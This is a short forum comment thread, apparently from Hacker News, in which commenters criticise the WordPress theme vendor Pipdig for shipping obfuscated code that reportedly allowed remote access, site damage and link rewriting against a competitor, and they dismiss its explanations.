[duskwuff]

Pathetic.

If I'm reading this correctly, they're essentially admitting to some of the malicious features described by the researcher, but claiming that they were included for support purposes, or as a way of sabotaging sites using pirated versions of their plugin.

1. Including features which can remotely grant unauthorized access or cause damage to a user's web site is inappropriate under any circumstances. Even if they're your customers, or if they aren't your customers, or whatever. You don't do that.

2. Pipdig hasn't come up with any sensible explanation for why their license checks were pointed at a competitor's web site. It's not even clear why the license check would be architected in a way that allowed for this.

3. Altering user's site content to change links from Blogerize to Pipdig is beyond the pale. Pipdig's explanation of this feature is incoherent; it isn't even consistent with the behavior of the code presented.

4. Obfuscating the code surrounding all of these questionable bits of functionality stinks of wrongdoing. It's understandable for a license check to be a little obfuscated, perhaps, but there's no reason why a remote administration feature should be (even if it had any reason for existing).

[ohashi]

We're just a poor small company... that is acts maliciously against our competitors using our code we sell to clients who have no idea! we're sorry we got caught and it's hard to explain why this isn't bad.

Oh and they deleted repos apparently, gotta hide the evidence

[pavel_lishin]

Didn't work: https://web.archive.org/web/20190331195338/bitbucket.org/pip...

[hrrsn]

Re #2, it's clear from reading the code that the function has absolutely nothing to do with a licensing check anyway.